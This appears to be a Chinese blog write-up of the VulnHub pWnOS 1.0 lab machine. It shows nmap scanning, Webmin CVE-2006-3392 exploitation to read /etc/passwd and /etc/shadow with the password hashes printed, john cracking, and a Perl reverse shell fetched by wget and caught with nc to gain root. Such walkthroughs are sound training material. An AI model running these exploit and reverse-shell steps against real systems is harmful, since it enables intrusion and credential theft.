vulnhub-----pWnOS1.0靶机

news2024/11/16 11:43:02

文章目录

  • 1.信息收集
  • 2.漏洞测试
  • 3.爆破hash
  • 4.提权

首先拿到一台靶机,就需要知道靶机的各种信息(IP地址,开放端口,有哪些目录,什么框架,cms是什么,网页有什么常见的漏洞,如sql注入,命令执行,文件包含等…),及各种收集工具的使用

1.信息收集

拿靶机的IP地址,一般有以下三种:

arp-scan -l
netdiscover -s high -h 10.10.10.0/24
nmap -sn 10.10.10.0/24

我的靶机IP地址是10.10.10.14,得到IP地址后,扫描开放的端口

┌──(root㉿kali)-[~/kali/vulnhub/pwnOS]
└─# nmap -p- 10.10.10.14 --min-rate 10000            //扫描1-65535的所有端口
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt

udp扫描

┌──(root㉿kali)-[~]
└─# nmap -sU 10.10.10.14 --min-rate 10000
PORT      STATE  SERVICE
137/udp   open   netbios-ns
162/udp   closed snmptrap
1033/udp  closed netinfo-local
2002/udp  closed globe
19141/udp closed unknown
30365/udp closed unknown
37783/udp closed unknown

端口服务扫描

┌──(root㉿kali)-[~/kali/vulnhub/pwnOS]
└─# nmap -sT -sV -O 10.10.10.14          
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-22 00:50 EDT
Nmap scan report for 10.10.10.14
Host is up (0.069s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM), Linux 2.6.22 - 2.6.23
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.21 seconds

通过扫描得到80端口是apache服务2.2.4版本,139和445是smb服务,10000端口是webmin框架(等下可以搜一下相关漏洞)
nmap常见漏洞扫描

┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p22,80,139,445,10000 10.10.10.14
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-22 00:51 EDT
Nmap scan report for 10.10.10.14
Host is up (0.0014s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum: 
|   /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
|   /index/: Potentially interesting folder
|_  /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
| http-vuln-cve2006-3392: 
|   VULNERABLE:
|   Webmin File Disclosure
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2006-3392
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
|       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
|       to bypass the removal of "../" directory traversal sequences.
|       
|     Disclosure date: 2006-06-29
|     References:
|       http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
|       http://www.exploit-db.com/exploits/1997/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
MAC Address: 00:0C:29:5E:18:C9 (VMware)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 321.72 seconds

分析:80端口有dos攻击,有/icons,/index,/php三个目录;10000端口有一个CVE-2006-3392,任意文件读取漏洞
访问80,10000端口,看看有什么东西
80
提示我们点击next
在这里插入图片描述http://10.10.10.14/index1.php?help=true&connect=true
在这里插入图片描述
http://10.10.10.14/index2.php?name=123&level=n00b&submit=Please+Help%21
在这个页面下,尝试加单引号闭合,然而并没有报错,将参数改为/etc/passwd,也没有什么用在这里插入图片描述
php页面有一个phpmyadmin,但是需要密码在这里插入图片描述

10000端口,应该是后台登陆页面
在这里插入图片描述

2.漏洞测试

在kali中searchsploit是一个很🐂的漏洞库,可以在里面搜各种poc

┌──(root㉿kali)-[~/kali/vulnhub/pwnOS]
└─# searchsploit webmin         
------------------------------------------------------ ---------------------------------
 Exploit Title                                        |  Path
------------------------------------------------------ ---------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory | cgi/webapps/23535.txt
phpMyWebmin 1.0 - 'target' Remote File Inclusion      | php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion  | php/webapps/2451.txt
Webmin - Brute Force / Command Execution              | multiple/remote/705.pl
webmin 0.91 - Directory Traversal                     | cgi/remote/21183.txt
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Sp | linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation               | linux/remote/21765.pl
Webmin 0.x - Code Input Validation                    | linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution          | multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI)                    | multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Command Execut | unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities               | cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Metasploit)  | cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execu | linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution                  | linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution  | linux/remote/47230.rb
Webmin 1.962 - 'Package Updates' Escape Bypass RCE (M | linux/webapps/49318.rb
Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery ( | linux/webapps/50144.py
Webmin 1.973 - 'save_user.cgi' Cross-Site Request For | linux/webapps/50126.py
Webmin 1.984 - Remote Code Execution (Authenticated)  | linux/webapps/50809.py
Webmin 1.996 - Remote Code Execution (RCE) (Authentic | linux/webapps/50998.py
Webmin 1.x - HTML Email Command Execution             | cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Dis | multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Dis | multiple/remote/2017.pl
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Met | linux/webapps/47330.rb
------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~/kali/vulnhub/pwnOS]
└─# searchsploit -m 2017.pl  
  Exploit: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
      URL: https://www.exploit-db.com/exploits/2017
     Path: /usr/share/exploitdb/exploits/multiple/remote/2017.pl
    Codes: CVE-2006-3392
 Verified: True
File Type: Perl script text executable
Copied to: /root/kali/vulnhub/pwnOS/2017.pl

使用perl

┌──(root㉿kali)-[~/kali/vulnhub/pwnOS]            
└─# perl 2017.pl 
Usage: 2017.pl <url> <port> <filename> <target>   //使用方法
TARGETS are
 0  - > HTTP 
 1  - > HTTPS
Define full path with file name 
Example: ./webmin.pl blah.com 10000 /etc/passwd
┌──(root㉿kali)-[~/kali/vulnhub/pwnOS]
└─# perl 2017.pl 10.10.10.14 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.10.10.14 on port 10000!
FILENAME:  /etc/passwd

 FILE CONTENT STARTED
 -----------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash

可以读取到/etc/passwd文件,读取/etc/shadow试试,也可以,那就拿加密密码去爆破

┌──(root㉿kali)-[~/kali/vulnhub/pwnOS]
└─# perl 2017.pl 10.10.10.14 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.10.10.14 on port 10000!
FILENAME:  /etc/shadow

 FILE CONTENT STARTED
 -----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

3.爆破hash

john 是一个密码破解工具,用于破解密码哈希值。它通常用于测试系统的密码强度,评估系统安全性,或者在授权测试中尝试获取未授权的访问

┌──(root㉿kali)-[~/kali/vulnhub/pwnOS]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
h4ckm3           (vmware) 

OK,爆破出VMware密码,尝试ssh登陆

┌──(root㉿kali)-[~]
└─# ssh vmware@10.10.10.14        
Unable to negotiate with 10.10.10.14 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
 //SSH 客户端与 SSH 服务器之间的密钥交换算法不匹配引起的
┌──(root㉿kali)-[~]
└─# ssh -oHostKeyAlgorithms=+ssh-dss vmware@10.10.10.14   
The authenticity of host '10.10.10.14 (10.10.10.14)' can't be established.
DSA key fingerprint is SHA256:r69naj+dUdsNI77F8/FCC9zwpVPk1rzzEdT5znXT/Lo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.14' (DSA) to the list of known hosts.
vmware@10.10.10.14's password: 
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Jun 20 14:35:37 2008
vmware@ubuntuvm:~$ id
uid=1000(vmware) gid=1000(vmware) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),111(lpadmin),112(admin),1000(vmware)

4.提权

提权主要从内核版本,suid,自动任务,sudo -l

vmware@ubuntuvm:~$ whoami
vmware
vmware@ubuntuvm:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/smbumount
/usr/bin/chfn
/usr/bin/sudoedit
/usr/bin/newgrp
/usr/bin/arping
/usr/bin/gpasswd
/usr/bin/smbmnt
/usr/bin/at
/usr/bin/chsh
/usr/sbin/pppd
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/apache2/suexec
/bin/su
/bin/umount
/bin/ping
/bin/ping6
/bin/check-foreground-console
/bin/fusermount
/bin/mount
/sbin/mount.cifs
/sbin/umount.cifs
/lib/dhcp3-client/call-dhclient-script
vmware@ubuntuvm:~$ cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
vmware@ubuntuvm:~$ sudo -l
[sudo] password for vmware:
Sorry, user vmware may not run sudo on ubuntuvm.
vmware@ubuntuvm:~$ uname -a
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux

在/var目录下发现webmin是具有root权限的,所以我们在利用2017.pl时可以直接读取/etc/shadow文件,也就是说,如果通过漏洞执行反弹shell时,反弹的是root,(因为是root权限执行的呀)
在这里插入图片描述OK
kali中自带有webshell脚本,在/usr/share/webshells/perl/perl-reverse-shell.pl,将perl-reverse-shell.pl,复制粘贴位shell.cgi后缀的,然后vim,修改里面的IP,为本地IP
为什么是perl呢?因为webmin是perl语言写的,如果使用.pl后缀,shell反弹不成功,所以改成cgi后缀的可执行文件在这里插入图片描述

靶机下载

python3 -m http.server 8888 
靶机cd到家目录
vmware@ubuntuvm:/var$ cd /home/vmware/
vmware@ubuntuvm:~$ wget http://10.10.10.10:8888/shell.cgi

通过2017.pl执行shell文件

┌──(root㉿kali)-[~/kali/vulnhub/pwnOS]
└─# perl 2017.pl 10.10.10.14 10000 /home/vmware/shell.cgi 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.10.10.14 on port 10000!
FILENAME:  /home/vmware/shell.cgi

 FILE CONTENT STARTED
 -----------------------------------
Browser IP address appears to be: 10.10.10.10<p>
┌──(root㉿kali)-[~]
└─# nc -lvnp 1234 
listening on [any] 1234 ...
connect to [10.10.10.10] from (UNKNOWN) [10.10.10.14] 56646
 01:16:57 up  3:37,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
vmware   pts/0    10.10.10.10      00:40   47.00s  0.10s  0.10s -bash
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
uid=0(root) gid=0(root)
/
/usr/sbin/apache: can't access tty; job control turned off
# id
uid=0(root) gid=0(root)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1538746.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

DC-3靶机

一.环境搭建 下载地址&#xff1a; http://www.five86.com/downloads/DC-3-2.zip 下载不下来的可以用迅雷输入上面的网址进行下载 虚拟机配置&#xff1a; 切换连接桥接模式为nat模式&#xff0c;启动靶机&#xff0c;出现如下报错&#xff0c;进入虚拟机配置 选中CD/DVD&…

C语言:自定义类型(结构体)

目录 一、结构的特殊声明二、结构的自引用三、结构体内存对齐1.对齐规则2.为什么存在内存对齐(1)平台原因 (移植原因)&#xff1a;(2)性能原因&#xff1a; 3.修改默认对齐数 四、结构体传参五、结构体实现位段1.什么是位段2.位段的内存分配3.位段的跨平台问题4.位段使用的注意…

使用Python和OpenFOAM进行流体力学模拟的基础示例

流体力学模拟通常涉及复杂的数学方程和数值方法&#xff0c;例如计算流体动力学(CFD)。OpenFOAM是一个开源的CFD工具箱&#xff0c;它使用C编写&#xff0c;但可以通过Python脚本进行自动化和定制。 以下是一个简单的示例&#xff0c;展示如何使用Python和OpenFOAM进行流体力学…

【嵌入式开发 Linux 常用命令系列 4.3 -- git add 时单独排除某个目录或者文件】

文章目录 git add 时单独排除某个目录或者文件使用 .gitignore 文件使用命令行排除文件或目录 git add 时单独排除某个目录或者文件 在使用 git add 命令时&#xff0c;如果你想要排除特定的目录或文件&#xff0c;可以使用 .gitignore 文件或使用路径规范来指定不想添加的文件…

YOLOv5-Y5周:yolo.py文件解读

本文为&#x1f517;365天深度学习训练营 中的学习记录博客 原作者&#xff1a;K同学啊|接辅导、项目定制 我的环境&#xff1a; 1.语言&#xff1a;python3.7 2.编译器&#xff1a;pycharm 3.深度学习框架Tensorflow/Pytorch 1.8.0cu111 一、代码解读 import argparse i…

pcie dllp FC

关于pcie dllp FC内容&#xff1a; 源地址&#xff1a; PCIe&#xff08;三&#xff09;—— PCIe协议栈&#xff0c;事务层和数据链路层 | Soul Orbit 3.2. 控制消息&#xff1a;DLLP&#xff08;Data Link Layer Packet&#xff09; 除了传输TLP数据包之外&#xff0c;数…

SQL96 返回顾客名称和相关订单号(表的普通联结、内联结inner join..on..)

方法一&#xff1a;普通联结 select cust_name, order_num from Customers C,Orders O where C.cust_id O.cust_id order by cust_name,order_num;方法二&#xff1a;使用内连接 select cust_name,order_num from Customers C inner join Orders O on C.cust_id O.cust_id …

泛型可空类型Nullable<T>

.Net Framework 4.8版本开始&#xff0c;引入了可空类型Nullable<T>. 对于引用类型的变量来说&#xff0c;如果未赋值&#xff0c;默认情况下是 Null 值&#xff0c; 对于值类型的变量&#xff0c;如果未赋值&#xff0c;整型变量的默认值为 0,Boolean默认为false&…

基于ssm小型企业办公自动化系统论文

摘 要 互联网发展至今&#xff0c;无论是其理论还是技术都已经成熟&#xff0c;而且它广泛参与在社会中的方方面面。它让信息都可以通过网络传播&#xff0c;搭配信息管理工具可以很好地为人们提供服务。针对小型企业办公信息管理混乱&#xff0c;出错率高&#xff0c;信息安全…

EPSON XV4001BC陀螺仪传感器汽车导航系统的应用

近年来为了提高汽车应用系统的可靠性,传感器融合系统被越来越多的应用到汽车领域,如汽车导航系统中的行人检测和预碰撞警告等,通过提供精准的导航信息,为驾驶员提供更安全,更稳定,更舒适的出行体验,例如在行人检测系统中,只使用低成本的红外传感器不能检测到行人的实际位置,而利…

hcip复习总结2(广域网与OSPF)

数据链路层面&#xff1a; 针对不同的物理链路定义不同的封装 局域网封装&#xff1a; Ethernet 2 &#xff08; TCP/IP &#xff09; &#xff0c; IEEE802.3 &#xff08; OSI &#xff09; 广域网封装&#xff1a; PPP HDLC FR ATM HDLC &#xff1a; 高级数据链路控制协…

自动化改变金融科技文档生命周期

金融科技公司可能处于软件开发的最前沿&#xff0c;但即使是最先进的系统也必须能够支持金融服务领域采用的一系列文档密集型程序。因此&#xff0c;绝大多数金融科技企业都使用数字文档管理解决方案&#xff0c;无论是内部构建的还是由第三方供应商开发的。金融科技公司可以通…

JavaScript高级(十)----JavaScript中的类【重述原型链】!

类 在JavaScript其实本来没有类的概念&#xff0c;哪怕是ES5以后的class&#xff0c;严格意义上来说也只是构造函数的语法糖&#xff0c;之所以喜欢称之为类&#xff0c;因为JavaScript也可以面向对象开发。 类的声明 class Person {}function Person1() {}// 上面两种写法本…

2024年3月22蚂蚁新村今日答案:以下哪一项是陕西省的非遗美食?

2024年3月22日蚂蚁新村今日问题的正确答案如下&#xff1a; 问题&#xff1a;以下哪一项是陕西省的非遗美食&#xff1f; 选项&#xff1a;驴肉火烧 水盆羊肉 答案&#xff1a;水盆羊肉 解析&#xff1a;水盆羊肉是陕西省的非遗美食。水盆羊肉是陕西省的一道传统著名饭食&a…

10秒让AI生成PPT,手残党福音

现如今AI确实成为了一个行业的风口无论什么行业都努力的将AI融入到自己产品的领域 AI扩写文字&#xff0c;聊天&#xff0c;生成图片&#xff0c;甚至是视频&#xff0c;都已经司空见惯 今天给大家介绍一款APP——AI生成PPT&#xff0c;一起来看看最终的效果怎么样。 软件分为…

[C++]日期类的实现

本专栏内容为&#xff1a;C学习专栏&#xff0c;分为初阶和进阶两部分。 通过本专栏的深入学习&#xff0c;你可以了解并掌握C。 &#x1f493;博主csdn个人主页&#xff1a;小小unicorn ⏩专栏分类&#xff1a;C &#x1f69a;代码仓库&#xff1a;小小unicorn的代码仓库&…

基于Verilog HDL的axi-lite主机模块

基于Verilog HDL的axi-lite主机模块 前文对axi_lite接口协议的各个信号做了详细讲解&#xff0c;本文通过Verilog Hdl编写一个通用接口转axi_lite接口协议的模块。 1、生成xilinx官方提供axi源码 Xilinx其实给用户提供了axi相关模块&#xff0c;获取方式如下&#xff0c;首先打…

AI视频风格转换动漫风:Stable Diffusion+TemporalKit

话不多说&#xff0c;直接开干。 基本方法 首先通过 Temporal-Kit 这个插件提取视频中的关键帧图片&#xff0c;然后使用 Stable Diffusion WebUI 重绘关键帧图片&#xff0c;然后再使用 Temporal-Kit 处理转换后的关键帧图片&#xff0c;它会自动补充关键帧之间的图片&#…

通讯录的动态实现

文章目录 通讯录的动态实现模块化编程通讯录的框架构建功能的具体实现初始化通讯录添加联系人删除联系人查找联系人修改联系人打印通讯录排序通讯录检查容量并扩容加载通讯录保留通讯录销毁通讯录 完整代码总结 通讯录的动态实现 模块化编程 分文件 不同模块放在不同的文件下 …

Word为图表设置图注并在图表清单中自动生成

1如果需要自动插入题注&#xff0c;请不要自己为文件增加新的标题样式或删除自带的标题1样式 2章节大标题最好是标题1&#xff0c;2,3而不要设置标题一、二、三&#xff0c;否则图例在自动生成时会显示 图一 -1&#xff0c;调整起来会非常不方便 若实在要使用大写中文标题&…